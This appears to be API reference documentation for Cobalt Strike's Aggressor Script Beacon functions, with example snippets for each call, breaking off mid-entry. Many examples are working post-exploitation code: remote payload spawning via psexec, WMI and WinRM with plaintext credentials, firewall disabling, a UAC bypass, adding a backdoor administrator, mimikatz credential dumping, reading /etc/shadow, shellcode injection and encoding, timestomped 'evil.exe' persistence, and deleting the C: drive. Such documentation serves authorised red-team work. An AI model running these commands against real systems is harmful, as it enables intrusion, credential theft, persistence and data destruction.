```python
bppid(*args, fork=False)
```

Set a parent process for Beacon's child processes
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the parent process ID. Specify 0 to reset to default behavipr.
Notes
1. The current session must have rights to access the specified parent process.
2. Attempts to spawn post-ex jobs under parent processes in another desktop session may fail. This limitation is due to how Beacon launches its "temporary" processes for post-exploitation jobs and injects code into them.
Example

__getexplorerpid($bid, &callback);__

sub getexplorerpid {
 bps($1, lambda({
  local('$pid $name $entry');
  foreach $entry (split("\n", $2)) {
   ($name, $null, $pid) = split("\\s+", $entry);
   if ($name eq "explorer.exe") {
    [$callback: $1, $pid];
   }
  }
 }, $callback => $2));
}

alias prepenv {
 btask($1, "Tasked Beacon to find explorer.exe and make it the PPID");
 getexplorerpid($1, {
  bppid($1, $2);
 });
}

## bps
```python
bps(*args, fork=False)
```

Task a Beacon to list processes
Variations

bps($1);

Output the results to the Beacon console.

bps($1, &callback);

Route results to the specified callback function.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - an optional callback function with the ps results. Arguments to the callback are: $1 = beacon ID, $2 = results
Example

on beacon_initial {
 bps($1);
}

## bpsexec
```python
bpsexec(*args, fork=False)
```

Ask Beacon to spawn a payload on a remote host. This function generates an Artifact Kit executable, copies it to the target, and creates a service to run it. Clean up is included too.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the target to spawn a payload onto
$3 - the listener to spawn
$4 - the share to copy the executable to
Example

brev2self();
bloginuser($1, "CORP", "Administrator", "toor");
bpsexec($1, "172.16.48.3", "my listener", "ADMIN\$");

## bpsexec_command
```python
bpsexec_command(*args, fork=False)
```

Ask Beacon to run a command on a remote host. This function creates a service on the remote host, starts it, and cleans it up.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the target to run the command on
$3 - the name of the service to create
$4 - the command to run.
Example

__disable the firewall on a remote target__

__beacon> shieldsdown [target]__

alias shieldsdown {
 bpsexec_command($1, $2, "shieldsdn", "cmd.exe /c netsh advfirewall set allprofiles state off");
}

## bpsexec_psh
```python
bpsexec_psh(*args, fork=False)
```

Ask Beacon to spawn a payload on a remote host. This function creates a service to run a PowerShell one-liner.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the target to spawn a payload onto
$3 - the listener to spawn
Example

brev2self();
bloginuser($1, "CORP", "Administrator", "toor");
bpsexec_psh($1, "172.16.48.3", "my listener");

## bpsinject
```python
bpsinject(*args, fork=False)
```

Inject Unmanaged PowerShell into a specific process and run the specified cmdlet
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the process to inject the session into
$3 - the process architecture (x86 | x64)
$3 - the cmdlet to run
Example

bpsinject($1, 1234, x64, "[System.Diagnostics.Process]::GetCurrentProcess()");

## bpwd
```python
bpwd(*args, silent=False, fork=False)
```
"
Ask Beacon to print its current working directory
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example

alias pwd {
 bpwd($1);
}

## breg_query
```python
breg_query(*args, fork=False)
```

Ask Beacon to query a key within the registry.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the path to the key
$3 - x86|x64 - which view of the registry to use
Example

alias typedurls {
 breg_query($1, "HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs", "x86");
}

## breg_queryv
```python
breg_queryv(*args, fork=False)
```

Ask Beacon to query a value within a registry key.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the path to the key
$3 - the name of the value to query
$4 - x86|x64 - which view of the registry to use
Example

alias winver {
 breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion", "ProductName", "x86");
}

## brev2self
```python
brev2self(*args, fork=False)
```

Ask Beacon to drop its current token. This calls the RevertToSelf() Win32 API.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example

alias rev2self {
 brev2self($1);
}

## brm
```python
brm(*args, silent=False, fork=False)
```
"
Ask Beacon to remove a file or folder.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the file or folder to remove
Example

__nuke the system__

brm($1, "c:\\");

## brportfwd
```python
brportfwd(*args, fork=False)
```

Ask Beacon to setup a reverse port forward.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the port to bind to on the target
$3 - the host to forward connections to
$4 - the port to forward connections to
Example

brportfwd($1, 80, "192.168.12.88", 80);

## brportfwd_stop
```python
brportfwd_stop(*args, fork=False)
```

Ask Beacon to stop a reverse port forward
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the port bound on the target
Example

brportfwd_stop($1, 80);

## brunas
```python
brunas(*args, fork=False)
```

Ask Beacon to run a command as another user.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the domain of the user
$3 - the user's username
$4 - the user's password
$5 - the command to run
Example

brunas($1, "CORP", "Administrator", "toor", "notepad.exe");

## brunasadmin
```python
brunasadmin(*args, fork=False)
```

Ask Beacon to run a command in a high-integrity context (bypasses UAC).
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the command and its arguments.
Notes
This command uses the Token Duplication UAC bypass. This bypass has a few requirements:

Your user must be a local admin
If Always Notify is enabled, an existing high integrity process must be running in the current desktop session.

Example

__disable the firewall__

brunasadmin($1, "cmd.exe /C netsh advfirewall set allprofiles state off");

## brunu
```python
brunu(*args, fork=False)
```

Ask Beacon to run a process under another process.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the PID of the parent process
$3 - the command + arguments to run
Example

brunu($1, 1234, "notepad.exe");

## bscreenshot
```python
bscreenshot(*args, silent=False, fork=False)
```
"
Ask Beacon to take a screenshot
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - how long to take the screenshot for
Example

item "&Screenshot" {
 binput($1, "screenshot");
 bscreenshot($1, 0);
}

## bsetenv
```python
bsetenv(*args, fork=False)
```

Ask Beacon to set an environment variable
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the environment variable to set
$3 - the value to set the environment variable to (specify $null to unset the variable)
Example

alias tryit {
 bsetenv($1, "foo", "BAR!");
 bshell($1, "echo %foo%");
}

## bshell
```python
bshell(*args, silent=False, fork=False)
```
"
Ask Beacon to run a command with cmd.exe
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the command and arguments to run
Example

alias adduser {
 bshell($1, "net user $2 B00gyW00gy1234! /ADD");
 bshell($1, "net localgroup \"Administrators\" $2 /ADD");
}

## bshinject
```python
bshinject(*args, fork=False)
```

Inject shellcode (from a local file) into a specific process
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the PID of the process to inject into
$3 - the process architecture (x86 | x64)
$4 - the local file with the shellcode
Example

bshinject($1, 1234, "x86", "/path/to/stuff.bin");

## bshspawn
```python
bshspawn(*args, fork=False)
```

Spawn shellcode (from a local file) into another process. This function benefits from Beacon's configuration to spawn post-exploitation jobs (e.g., spawnto, ppid, etc.)
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the process architecture (x86 | x64)
$3 - the local file with the shellcode
Example

bshspawn($1, "x86", "/path/to/stuff.bin");

## bsleep
```python
bsleep(*args, silent=False, fork=False)
```
"
Ask Beacon to change its beaconing interval and jitter factor.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the number of seconds between beacons.
$3 - the jitter factor [0-99]
Example

alias stealthy {
 # sleep for 1 hour with 30% jitter factor
 bsleep($1, 60 * 60, 30);
}

## bsocks
```python
bsocks(*args, fork=False)
```

Start a SOCKS proxy server associated with a beacon.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the port to bind to
Example

alias socks1234 {
 bsocks($1, 1234);
}

## bsocks_stop
```python
bsocks_stop(*args, fork=False)
```

Stop SOCKS proxy servers associated with the specified Beacon.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example

alias stopsocks {
 bsocks_stop($1);
}

## bspawn
```python
bspawn(*args, fork=False)
```

Ask Beacon to spawn a new session
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the listener to target.
$3 - the architecture to spawn a process for (defaults to x86)
Example

item "&Spawn" {
 openPayloadHelper(lambda({
  binput($bids, "spawn x86 $1");
  bspawn($bids, $1, "x86");
 }, $bids => $1));
}

## bspawnas
```python
bspawnas(*args, fork=False)
```

Ask Beacon to spawn a session as another user.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the domain of the user
$3 - the user's username
$4 - the user's password
$5 - the listener to spawn
Example

bspawnas($1, "CORP", "Administrator", "toor", "my listener");

## bspawnto
```python
bspawnto(*args, fork=False)
```

Change the default program Beacon spawns to inject capabilities into.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the program to spawn
$3 - the architecture we're modifying the spawnto setting for (x86, x64)
Notes
The value you specify for spawnto has to work from x86->x86, x86->x64, x64->x86, and x64->x86 contexts. This is tricky. Follow these rules and you'll be OK:
1. Always specify the full path to the program you want Beacon to spawn for its post-ex jobs.
2. Environment variables (e.g., %windir%) are OK within these paths.
3. Do not specify %windir%\system32 or c:\windows\system32 directly. Always use syswow64 (x86) and sysnative (x64). Beacon will adjust these values to system32 if it's necessary.
4. For an x86 spawnto value, you must specify an x86 program. For an x64 spawnto value, you must specify an x64 program.
Example

__let's make everything lame.__

on beacon_initial {
 bspawnto($1, "%windir%\\syswow64\\notepad.exe", "x86");
 bspawnto($1, "%windir%\\sysnative\\notepad.exe", "x64");
}

## bspawnu
```python
bspawnu(*args, fork=False)
```

Ask Beacon to spawn a session under another process. This builds on &brunu and uses powershell.exe.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the process to spawn this session under
$3 - the listener to spawn
Example

bspawnu($1, 1234, "my listener");

## bssh
```python
bssh(*args, fork=False)
```

Ask Beacon to spawn an SSH session.
Arguments
$1 - id for the beacon. This may be an array or a single ID.
$2 - IP address or hostname of the target
$3 - port (e.g., 22)
$4 - username
$5 - password
Example

bssh($1, "172.16.20.128", 22, "root", "toor");

## bssh_key
```python
bssh_key(*args, fork=False)
```

Ask Beacon to spawn an SSH session.
Arguments
$1 - id for the beacon. This may be an array or a single ID.
$2 - IP address or hostname of the target
$3 - port (e.g., 22)
$4 - username
$5 - key data (as a string)
Example

$handle = openf("/path/to/key.pem");
$keydata = readb($handle, -1);
closef($handle);

bssh_key($1, "172.16.20.128", 22, "root", $keydata);

## bstage
```python
bstage(*args, fork=False)
```

This function handles the staging process for a bind listener. If the specified listener is not a bind listener, this function does nothing. Otherwise, it completes the staging protocol over a named pipe or a local socket.
Arguments
$1 - the id of the beacon to stage through
$2 - the target host to stage to [bind_pipe] or $null for localhost [bind_tcp]
$3 - the listener to stage
$4 - the architecture of the payload stage (x86, x64)
Example

__stage [target] [listener name]__

alias stage {
 bstage($1, $2, $3, "x86");
}

## bsteal_token
```python
bsteal_token(*args, fork=False)
```

Ask Beacon to steal a token from a process.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the PID to take the token from
Example

alias steal_token {
 bsteal_token($1, int($2));
}

## bsudo
```python
bsudo(*args, fork=False)
```

Ask Beacon to run a command via sudo (SSH sessions only)
Arguments
$1 - the id for the session. This may be an array or a single ID.
$2 - the password for the current user
$3 - the command and arguments to run
Example

__hashdump [password]__

ssh_alias hashdump {
 bsudo($1, $2, "cat /etc/shadow");
}

## btask
```python
btask(*args, fork=False)
```

Report a task acknowledgement for a Beacon. This task acknowledgement will also contribute to the narrative in Cobalt Strike's Activity Report and Sessions Report.
Arguments
$1 - the id for the beacon to post to
$2 - the text to post
$3 - a string with MITRE ATT&CK Tactic IDs. Use a comma and a space to specify multiple IDs in one string.
https://attack.mitre.org
Example

alias foo {
 btask($1, "User tasked beacon to foo", "T1015");
}

## btimestomp
```python
btimestomp(*args, silent=False, fork=False)
```
"
Ask Beacon to change the file modified/accessed/created times to match another file.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the file to update timestamp values for
$3 - the file to grab timestamp values from
Example

alias persist {
 bcd($1, "c:\\windows\\system32");
 bupload($1, script_resource("evil.exe"));
 btimestomp($1, "evil.exe", "cmd.exe");
 bshell($1, 'sc create evil binpath= "c:\\windows\\system32\\evil.exe"');
 bshell($1, 'sc start netsrv');
}

## bunlink
```python
bunlink(*args, fork=False)
```

Ask Beacon to delink a Beacon its connected to over a TCP socket or named pipe.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the target host to unlink (specified as an IP address)
Example

bunlink($1, "172.16.48.3");

## bupload
```python
bupload(*args, fork=False)
```

Ask a Beacon to upload a file
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the local path to the file to upload
Example

bupload($1, script_resource("evil.exe"));

## bupload_raw
```python
bupload_raw(*args, silent=False, fork=False)
```
"
Ask a Beacon to upload a file
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the remote file name of the file
$3 - the raw content of the file
$4 - [optional] the local path to the file (if there is one)
Example

$data = artifact("my listener", "exe");
bupload_raw($1, "\\\\DC\\C$\\foo.exe", $data);

## bwdigest
```python
bwdigest(*args, fork=False)
```

Ask Beacon to dump in-memory credentials with mimikatz [with the wdigest command]. The &blogonpasswords option is superior to this command.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example

item "Dump &Passwords (WDigest)" {
 binput($1, "wdigest");
 bwdigest($1);
}



## bwinrm
```python
bwinrm(*args, fork=False)
```

Ask Beacon to spawn a payload on a remote host. This function uses WinRM to run a PowerShell one-liner
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the target to spawn a payload onto
$3 - the listener to spawn
Example

brev2self();
bloginuser($1, "CORP", "Administrator", "toor");
bwinrm($1, "172.16.48.3", "my listener");

## bwmi
```python
bwmi(*args, fork=False)
```

Ask Beacon to spawn a payload on a remote host. This function uses WMI to run a PowerShell one-liner
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the target to spawn a payload onto
$3 - the listener to spawn
Example

brev2self();
bloginuser($1, "CORP", "Administrator", "toor");
bwmi($1, "172.16.48.3", "my listener");

## call
```python
call(*args, fork=False)
```

Issue a call to the team server.
Arguments
$1 - the command name
$2 - a callback to receive a response to this request. The callback will receive two arguments. The first is the call name. The second is the response.
... - one or more arguments to pass into this call.
Example

call("aggressor.ping", { warn(@_); }, "this is my value");

## closeClient
```python
closeClient(*args, fork=False)
```

Close the current Cobalt Strike team server connection.
Example

closeClient();

## credential_add
```python
credential_add(*args, fork=False)
```

Add a credential to the data model
Arguments
$1 - username
$2 - password
$3 - realm
$4 - source
$5 - host
Example

command falsecreds {
 for ($x = 0; $x < 100; $x++) {
  credential_add("user $+ $x", "password $+ $x");
 }
}

## credentials
```python
credentials(*args, fork=False)
```

Returns a list of application credentials in Cobalt Strike's data model.
Returns
An array of dictionary objects with information about each credential entry.
Example

printAll(credentials());

## data_keys
```python
data_keys(*args, fork=False)
```

List the query-able keys from Cobalt Strike's data model
Returns
A list of keys that you may query with &data_query
Example

foreach $key (data_keys()) {
 println("\n\c4=== $key ===\n");
 println(data_query($key));
}

## data_query
```python
data_query(*args, fork=False)
```

Queries Cobalt Strike's data model
Arguments
$1 - the key to pull from the data model
Returns
A Sleep representation of the queried data.
Example

println(data_query("targets"));

## dbutton_action
```python
dbutton_action(*args, fork=False)
```

Adds an action button to a &dialog. When this button is pressed, the dialog closes and its callback is called. You may add multiple buttons to a dialog. Cobalt Strike will line these buttons up in a row and center them at the bottom of the dialog.
Arguments
$1 - the $dialog object
$2 - the button label
Example

dbutton_action($dialog, "Start");
dbutton_action($dialog, "Stop");

## dbutton_help
```python
dbutton_help(*args, fork=False)
```

Adds a Help button to a &dialog. When this button is pressed, Cobalt Strike will open the user's browser to the specified URL.
Arguments
$1 - the $dialog object
$2 - the URL to go to
Example

dbutton_help($dialog, "http://www.google.com");

## dialog
```python
dialog(*args, fork=False)
```

Create a dialog. Use &dialog_show to show it.
Arguments
$1 - the title of the dialog
$2 - a %dictionary mapping row names to default values
$3 - a callback function. Called when the user presses a &dbutton_action button. $1 is a reference to the dialog. $2 is the button name. $3 is a dictionary that maps each row's name to its value.
Returns
A scalar with a $dialog object.
Example

sub callback {
 # prints: Pressed Go, a is: Apple
 println("Pressed $2 $+ , a is: " . $3['a']);
}

$dialog = dialog("Hello World", %(a => "Apple", b => "Bat"), &callback);
drow_text($dialog, "a", "Fruit:  ");
drow_text($dialog, "b", "Rodent: ");
dbutton_action($dialog, "Go");
dialog_show($dialog);

## dialog_description
```python
dialog_description(*args, fork=False)
```

Adds a description to a &dialog
Arguments
$1 - a $dialog object
$2 - the description of this dialog
Example

dialog_description($dialog, "I am the Hello World dialog.");

## dialog_show
```python
dialog_show(*args, fork=False)
```

Shows a &dialog.
Arguments
$1 - the $dialog object
Example

dialog_show($dialog);

## dispatch_event
```python
dispatch_event(*args, fork=False)
```

Call a function in Java Swing's Event Dispatch Thread. Java's Swing Library is not thread safe. All changes to the user interface should happen from the Event Dispatch Thread.
Arguments
$1 - the function to call
Example

dispatch_event({
 println("Hello World");
});

## downloads
```python
downloads(*args, fork=False)
```

Returns a list of downloads in Cobalt Strike's data model.
Returns
An array of dictionary objects with information about each downloaded file.
Example

printAll(downloads());

## drow_beacon
```python
drow_beacon(*args, fork=False)
```

Adds a beacon selection row to a &dialog
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example

drow_beacon($dialog, "bid", "Session: ");

## drow_checkbox
```python
drow_checkbox(*args, fork=False)
```

Adds a checkbox to a &dialog
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
$4 - the text next to the checkbox
Example

drow_checkbox($dialog, "box", "Scary: ", "Check me... if you dare");

## drow_combobox
```python
drow_combobox(*args, fork=False)
```

Adds a combobox to a &dialog
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
$4 - an array of options to choose from
Example

drow_combobox($dialog, "combo", "Options", @("apple", "bat", "cat"));

## drow_exploits
```python
drow_exploits(*args, fork=False)
```

Adds a privilege escalation exploit selection row to a &dialog
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example

drow_exploits($dialog, "exploit", "Exploit: ");

## drow_file
```python
drow_file(*args, fork=False)
```

Adds a file chooser row to a &dialog
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example

drow_file($dialog, "file", "Choose: ");

## drow_interface
```python
drow_interface(*args, fork=False)
```

Adds a VPN interface selection row to a &dialog
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example

drow_interface($dialog, "int", "Interface: ");

## drow_krbtgt
```python
drow_krbtgt(*args, fork=False)
```

Adds a krbtgt selection row to a &dialog
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example

drow_krbtgt($dialog, "hash", "krbtgt hash: ");

## drow_listener
```python
drow_listener(*args, fork=False)
```

Adds a listener selection row to a &dialog. This row does not show SMB listeners.
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example

drow_listener($dialog, "listener", "Listener: ");

## drow_listener_smb
```python
drow_listener_smb(*args, fork=False)
```

Adds a listener selection row to a &dialog. This row shows SMB listeners.
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example

drow_listener_smb($dialog, "listener", "Listener: ");

## drow_listener_stage
```python
drow_listener_stage(*args, fork=False)
```

Adds a listener selection row to a &dialog. This row shows local Beacon listeners with stages only. Foreign listeners and listeners from other servers are excluded.
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example

drow_listener_stage($dialog, "listener", "Stage: ");

## drow_mailserver
```python
drow_mailserver(*args, fork=False)
```

Adds a mail server field to a &dialog.
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example

drow_mailserver($dialog, "mail", "SMTP Server: ");

## drow_proxyserver
```python
drow_proxyserver(*args, fork=False)
```

Adds a proxy server field to a &dialog.
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example

drow_proxyserver($dialog, "proxy", "Proxy: ");

## drow_site
```python
drow_site(*args, fork=False)
```

Adds a site/URL field to a &dialog.
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example

drow_site($dialog, "url", "Site: ");

## drow_text
```python
drow_text(*args, fork=False)
```

Adds a text field row to a &dialog
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
$4 - Optional. The width of this text field (in characters). This value isn't always honored (it won't shrink the field, but it will make it wider).
Example

drow_text($dialog, "name", "Name: ");

## drow_text_big
```python
drow_text_big(*args, fork=False)
```

Adds a multi-line text field to a &dialog
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example

drow_text_big($dialog, "addr", "Address: ");

## dstamp
```python
dstamp(*args, fork=False)
```

Format a time into a date/time value. This value includes seconds.
Arguments
$1 - the time [milliseconds since the UNIX epoch]
Example

println("The time is now: " . dstamp(ticks()));

See Also
&tstamp

## elog
```python
elog(*args, fork=False)
```

Publish a notification to the event log
Arguments
$1 - the message
Example

elog("The robot invasion has begun!");

## encode
```python
encode(*args, fork=False)
```

Obfuscate a position-independent blob of code with an encoder.
Arguments
$1 - position independent code (e.g., shellcode, "raw" stageless Beacon) to apply encoder to
$2 - the encoder to use
$3 - the architecture (e.g., x86, x64)


Encoder
Description


alpha
Alphanumeric encoder (x86-only)


xor
XOR encoder


Notes
1. The encoded position-independent blob must run from a memory page that has RWX permissions or the decode step will crash the current process.
2. alpha encoder: The EDI register must contain the address of the encoded blob. &encode prepends a 10-byte (non-alphanumeric) program to the beginning of the alphanumeric encoded blob. This program calculates the location of the encoded blob and sets EDI for you. If you plan to set EDI yourself, you may remove these first 10 bytes.
Returns
A position-independent blob that decodes the original string and passes execution to it.
Example

__generate shellcode for a listener__

$stager = shellcode("my listener", false "x86");

__encode it.__

$stager = encode($stager, "xor", "x86");

## fireAlias
```python
fireAlias(*args, fork=False)
```

Runs a user-defined alias
Arguments
$1 - the beacon id to run the alias against
$2 - the alias name to run
$3 - the arguments to pass to the alias.
Example

__run the foo alias when a new Beacon comes in__

on beacon_initial {
 fireAlias($1, "foo", "bar!");
}

## fireEvent
```python
fireEvent(*args, fork=False)
```

Fire an event.
Arguments
$1 - the event name
... - the event arguments.
Example

on foo {
 println("Argument is: $1");
}

fireEvent("foo", "Hello World!");

## format_size
```python
format_size(*args, fork=False)
```

Formats a number into a size (e.g., 1024 => 1kb)
Arguments
$1 - the size to format
Returns
A string representing a human readable data size.
Example

println(format_size(1024));


## gunzip
```python
gunzip(*args, fork=False)
```

Decompress a string (GZIP).
Arguments
$1 - the string to compress
Returns
The argument processed by the gzip de-compressor
Example

println(gunzip(gzip("this is a test")));

See Also
&gzip

## gzip
```python
gzip(*args, fork=False)
```

GZIP a string.
Arguments
$1 - the string to compress
Returns
The argument processed by the gzip compressor
Example

println(gzip("this is a test"));

See Also
&gunzip
## host_delete
```python
host_delete(*args, fork=False)
```

Delete a host from the targets model
Arguments
$1 - the IPv4 or IPv6 address of this target [you may specify an array of hosts too]
Example

__clear all hosts__

host_delete(hosts());

## host_info
```python
host_info(*args, fork=False)
```

Get information about a target.
Arguments
$1 - the host IPv4 or IPv6 address
$2 - [Optional] the key to extract a value for
Returns

%info = host_info("address");

Returns a dictionary with known information about this target.

$value = host_info("address", "key");

Returns the value for the specified key from this target's entry in the data model.
Example

__create a script console alias to dump host info__

command host {
 println("Host $1");
 foreach $key => $value (host_info($1)) {
  println("$[15]key $value");
 }
}

## host_update
```python
host_update(*args, fork=False)
```

Add or update a host in the targets model
Arguments
$1 - the IPv4 or IPv6 address of this target [you may specify an array of hosts too]
$2 - the DNS name of this target
$3 - the target's operating system
$4 - the operating system version number (e.g., 10.0)
$5 - a note for the target.
Note
You may specify a $null value for any argument and, if the host exists, no change will be made to that value.
Example

host_update("192.168.20.3", "DC", "Windows", 10.0);

## hosts
```python
hosts(*args, fork=False)
```

Returns a list of IP addresses from Cobalt Strike's target model
Returns
An array of IP addresses
Example

printAll(hosts());

## insert_menu
```python
insert_menu(*args, fork=False)
```

Bring menus associated with a popup hook into the current menu tree.
Arguments
$1 - the popup hook
... - additional arguments are passed to the child popup hook.
Example

popup beacon {
 # menu definitions above this point

 insert_menu("beacon_bottom", $1);

 # menu definitions below this point
}

## iprange
```python
iprange(*args, fork=False)
```

Generate an array of IPv4 addresses based on a string description
Arguments
$1 - a string with a description of IPv4 ranges


Range
Result


192.168.1.2
The IP4 address 192.168.1.2


192.168.1.1, 192.168.1.2
The IPv4 addresses 192.168.1.1 and 192.168.1.2


192.168.1.0/24
The IPv4 addresses 192.168.1.0 through 192.168.1.255


192.168.1.18-192.168.1.30
The IPv4 addresses 192.168.1.18 through 192.168.1.29


192.168.1.18-30
The IPv4 addresses 192.168.1.18 through 192.168.1.29


Returns
An array of IPv4 addresses within the specified ranges.
Example

printAll(iprange("192.168.1.0/25"));

## keystrokes
```python
keystrokes(*args, fork=False)
```

Returns a list of keystrokes from Cobalt Strike's data model.
Returns
An array of dictionary objects with information about recorded keystrokes.
Example

printAll(keystrokes());

## licenseKey
```python
licenseKey(*args, fork=False)
```

Get the license key for this instance of Cobalt Strike
Returns
Your license key.
Example

println("Your key is: " . licenseKey());

## listener_create
```python
listener_create(*args, fork=False)
```

Create a new listener.
Arguments
$1 - the listener name
$2 - the payload (e.g., windows/beacon_http/reverse_http)
$3 - the listener host
$4 - the listener port
$5 - a comma separated list of addresses for listener to beacon to
Example

__create a foreign listener__

listener_create("My Metasploit", "windows/foreign_https/reverse_https",
  "ads.losenolove.com", 443);

__create an HTTP Beacon listener__

listener_create("Beacon HTTP", "windows/beacon_http/reverse_http",
  "www.losenolove.com", 80,
  "www.losenolove.com, www2.losenolove.com");

## listener_delete
```python
listener_delete(*args, fork=False)
```

Stop and remove a listener.
Arguments
$1 - the listener name
Example

listener_delete("Beacon HTTP");

## listener_describe
```python
listener_describe(*args, fork=False)
```

Describe a listener.
Arguments
$1 - the listener name
$2 - [Optional] the remote target the listener is destined for
Returns
A string describing the listener
Example

foreach $name (listeners()) {
 println("$name is: " . listener_describe($name));
}

## listener_info
```python
listener_info(*args, fork=False)
```

Get information about a listener.
Arguments
$1 - the listener name
$2 - [Optional] the key to extract a value for
Returns

%info = listener_info("listener name");

Returns a dictionary with the metadata for this listener.

$value = listener_info("listener name", "key");

Returns the value for the specified key from this listener's metadata
Example

__create a script console alias to dump listener info__

command dump {
 println("Listener $1");
 foreach $key => $value (listener_info($1)) {
  println("$[15]key $value");
 }
}

## listener_pivot_create
```python
listener_pivot_create(*args, fork=False)
```

Create a new pivot listener.
Arguments
$1 - the Beacon ID
$2 - the listener name
$3 - the payload (e.g., windows/beacon_reverse_tcp)
$4 - the listener host
$5 - the listener port
Note
The only valid payload argument is windows/beacon_reverse_tcp.
Example

__create a pivot listener:__

__$1 = beaconID, $2 = name, $3 = port__

alias plisten {
 local('$lhost $bid $name $port');

 # extract our arguments
 ($bid, $name, $port) = @_;

 # get the name of our target
 $lhost = beacon_info($1, "computer");

 btask($1, "create TCP listener on $lhost $+ : $+ $port");
 listener_pivot_create($1, $name, "windows/beacon_reverse_tcp", $lhost, $port);
}

## listener_restart
```python
listener_restart(*args, fork=False)
```

Restart a listener
Arguments
$1 - the listener name
Example

listener_restart("Beacon HTTP");

## listeners
```python
listeners(*args, fork=False)
```

Return a list of listener names across all team servers this client is connected to.
Returns
An array of listener names.
Example

printAll(listeners());

## listeners_local
```python
listeners_local(*args, fork=False)
```

Return a list of listener names. This function limits itself to the current team server only.
Returns
An array of listener names.
Example

printAll(listeners_local());

## localip
```python
localip(*args, fork=False)
```

Get the IP address associated with the team server.
Returns
A string with the team server's IP address.
Example

println("I am: " . localip());

## mynick
```python
mynick(*args, fork=False)
```

Get the nickname associated with the current Cobalt Strike client.
Returns
A string with your nickname.
Example

println("I am: " . mynick());

## nextTab
```python
nextTab(*args, fork=False)
```

Activate the tab that is to the right of the current tab.
Example

bind Ctrl+Right {
 nextTab();
}

## on
```python
on(*args, fork=False)
```

Register an event handler. This is an alternate to the on keyword.
Arguments
$1 - the name of the event to respond to
$2 - a callback function. Called when the event happens.
Example

sub foo {
 blog($1, "Foo!");
}

on("beacon_initial", &foo);

## openAboutDialog
```python
openAboutDialog(*args, fork=False)
```

Open the "About Cobalt Strike" dialog
Example

openAboutDialog();

## openApplicationManager
```python
openApplicationManager(*args, fork=False)
```

Open the application manager (system profiler results) tab.
Example

openApplicationManager();

## openAutoRunDialog
```python
openAutoRunDialog(*args, fork=False)
```

Open the Auto Run / USB attack dialog.
Example

openAutoRunDialog();

## openBeaconBrowser
```python
openBeaconBrowser(*args, fork=False)
```

Open the beacon browser tab.
Example

openBeaconBrowser();

## openBeaconConsole
```python
openBeaconConsole(*args, fork=False)
```

Open the console to interact with a Beacon
Arguments
$1 - the Beacon ID to apply this feature to
Example

item "Interact" {
 local('$bid');
 foreach $bid ($1) {
  openBeaconConsole($bid);
 }
}

## openBrowserPivotSetup
```python
openBrowserPivotSetup(*args, fork=False)
```

open the browser pivot setup dialog
Arguments
$1 - the Beacon ID to apply this feature to
Example

item "Browser Pivoting" {
 local('$bid');
 foreach $bid ($1) {
  openBrowserPivotSetup($bid);
 }
}

## openBypassUACDialog
```python
openBypassUACDialog(*args, fork=False)
```

Open the dialog for the Bypass UAC feature.
Arguments
$1 - the beacon ID
Example

item "Bypass UAC" {
 local('$bid');
 foreach $bid ($1) {
  openBypassUACDialog($bid);
 }
}

## openCloneSiteDialog
```python
openCloneSiteDialog(*args, fork=False)
```

Open the dialog for the website clone tool.
Example

openCloneSiteDialog();

## openConnectDialog
```python
openConnectDialog(*args, fork=False)
```

Open the connect dialog.
Example

openConnectDialog();

## openCovertVPNSetup
```python
